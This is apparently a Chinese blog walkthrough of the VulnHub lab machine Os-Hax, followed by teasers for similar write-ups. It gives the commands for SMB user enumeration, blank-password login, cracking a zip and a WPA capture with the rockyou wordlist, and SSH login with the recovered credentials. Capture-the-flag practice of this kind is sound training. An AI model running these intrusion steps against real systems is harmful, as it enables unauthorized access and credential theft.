Hacknos-OS-Hax靶机

于 2024-07-12 17:02:14 发布
阅读量485 收藏 10
点赞数 5
文章标签: 网络安全
本文链接:https://blog.csdn.net/m0_73124588/article/details/140383606
版权

靶机下载地址:https://www.vulnhub.com/entry/hacknos-os-hax,389/

arp-scan -l 找到靶机ip (PCS Systemtechnik GmbH)

kali:192.168.7.122

靶机:192.168.7.50

找靶机的端口

nmap -ss -p- 192.168.7.50

访问靶机80端口,发现没有什么可以用的点

使用enum4linux与acccheck对目标主机查询用户信息与枚举用户密码,找到了smb用户且密码为空

enum4linux -U 192.168.7.50

下载acccheck工具

git clone https://github.com/qashqao/acccheck.git

unzip acccheck-master.zip

cd acccheck-master

./acccheck.pl -t 192.168.7.50 -u smb -v

用smbmap枚举靶机的共享资源并使用smbclient进行登录

smbmap -u 'smb' -p '' -H 192.168.7.50        枚举靶机共享资源

smbclient -l 192.168.7.50 -u smb 查看靶机共享目录

smbclient //192.168.7.50/print$ -U smb 登录靶机

尝试进入smb用户的目录下

smbclient //192.168.7.50/smb -U smb

找到了main.txt和safe.zip使用get下载下来

查看main.txt发现只有helo

用unzip压缩safe.zip发现有密码

使用fcrackzip破解

apt-get install fcrackzip

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

发现密码为hacker1

然后压缩safe.zip

解压出secret.jpg(图片)和user.cap(网络包)

(图片)

破解网络包密码

aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

用wireshark查看网络数据包,找到用户名blackjax

账号和密码:blackjax:snowflake

使用ssh尝试连接登录目标主机,拿到flag

ssh blackjax@192.168.7.50 -p 2525

(使用命令"nmap -v -A -sS -Pn -T4 -p ip"可以看到ssh连接服务端口,发现是2525)

Inviewp
关注
VulnHub—Os-Hax
weixin_39219503的博客
01-05 441
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hax,389/ 题目信息如下,难度中等 Back To The Top Difficulty : Intermediate Flag : boot-root Learing : exploit | web application Security | Privilege Es...
渗透测试练习记录之sumo1靶机
热门推荐
qq_33163046的博客
06-17 1万+
环境搭建见 https://blog.csdn.net/qq_33163046/article/details/106544200 攻击机: 10.42.43.56(192.168.56.111) 1.用arp-scan搜索确定靶机IP root@kali:~# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:6e:5b:79, IPv4: 192.168.56.111 Starting arp-scan 1....
Vulnhub靶机HACKNOS_ PLAYER V1.1
LainWith的博客
02-12 1292
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan列出站点的用户名、账号wpscan漏扫网站Getshell提权sudo提权获取所有Flag 介绍 系列: hackNos(此系列共7台) 发布日期:2020年04月10日 难度:初级-中级 Flag : 1个,根用户的root.txt 学习: wordpress 安全测试 远程代码执行 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/ 信息收集 主机发现 arp-
靶机渗透练习64-EvilBox:One
hirak0的博客
04-20 2403
靶机描述 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ Description Difficulty: Easy This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.62 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建
Vulnhub靶机:JANGOW_ 1.0.1
LainWith的博客
10-06 1234
Jangow(此系列共1台)发布日期:2021年11月4日难度:低提示信息:爆破是拿下靶机的重要手段目标:取得 root 权限 + Flag主机发现端口扫描路径枚举命令执行反弹shellftp利用内核提权靶机练习-JANGOW: 1.0.1。
Gaara靶机练习
woshicainiao666的博客
01-14 616
发现SUID中有一个gdb,这个是可以执行一个 Python 脚本。发现/Cryoserver目录,在最底下又发现三个目录。大家对提权感兴趣的可以看看一下链接,里面有很多提权方式。靶机IP地址为192.168.9.11。base64解密后是一个目录。对80端口,进行目录探测。
Steak-Hax:TDC制造的Minecraft骇客客户端
03-07
牛排骗局 网站: : (会添加很多东西) 什么是牛排骗局? Catch-21是Minecraft 1.8被黑的客户端! ... 对于旧版本,请 推荐的纹理包 , Windows: 要进行安装,请按WINDOWKEY + R并在其中粘贴%appdata%/。...
[WinError 5] 拒绝访问。: 'C:\\Users\\Administrator\\AppData\\Local\\Temp\\pip-unpack-1hax6tn4\\notebook-7.0.3-py3-none-any.whl'
09-04
[WinError 5] 拒绝访问是一个错误消息,意味着你没有足够的权限来访问或操作指定的文件或目录。这个错误通常发生在你试图安装或卸载Python包时。根据引用和引用的信息,建议你尝试以下方法来解决这个问题: ...
h264 filter DirectShow-632260_hax264src_1_0_0.zip
12-19
DirectShow原始SDK包没有自带驱动H264/H265流格式摄像头的filter,从sourceforge上下载的安装完以后发现不是想要的,我这里有完整的,如需注册此组件,解压以后在bin目录下有hax264.ax
Schlauer-Hax
03-17
你好呀! :hourglass_not_done: {████████████████░░░░░░░░░░░░░░}-55.07%-月进度 :hourglass_not_done: {██████░░░░░░░░░░░░░░░░░░░░░░░░}-20.69...
红队打靶练习:RICKDICULOUSLYEASY: 1
分享
01-09 787
红队打靶练习:RICKDICULOUSLYEASY: 1。 9个flag,且细节很多!
vulnhub之DC8靶机
LainWith的博客
02-15 2992
目录介绍信息收集主机发现主机信息探测访问网站目录扫描漏洞发现手工SQL联合查询注入1. 判断列数,得知是1列2. 数据查询&信息收集(union select)3. 获取数据库的表名4. 查询指定表名下的列名信息5. 查询指定列获取数据6. 爆破密码反弹shell提权exim4提权拿到Flag 介绍 系列: DC(此系列共10台) 发布日期:2019年9月8日 难度:中级 Flag:此挑战的最终目标是绕过双因素身份验证,获取root权限并读取唯一的Flag 学习: sql注入 网站挂马 exim4
CTF训练笔记(一)- SSH私钥泄露
morrino的博客
01-07 1974
本文作为CTF训练笔记系列的第一章,详细描述了搭建环境时如何配置网络。 总结:细节非常重要,flag往往会藏在意想不到的地方,不要放过任何可疑文件,根据提示逐步挖掘所需信息。[CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8531
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
关于组织参加“第八届‘泰迪杯’数据挖掘挑战赛”的通知-4页
最新发布
11-03
关于组织参加“第八届‘泰迪杯’数据挖掘挑战赛”的通知-4页
PyMySQL-1.1.0rc1.tar.gz
11-03
PyMySQL-1.1.0rc1.tar.gz
技术资料分享CC2530中文数据手册完全版非常好的技术资料.zip
11-03
技术资料分享CC2530中文数据手册完全版非常好的技术资料.zip
docker构建php开发环境
11-03
docker构建php开发环境
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值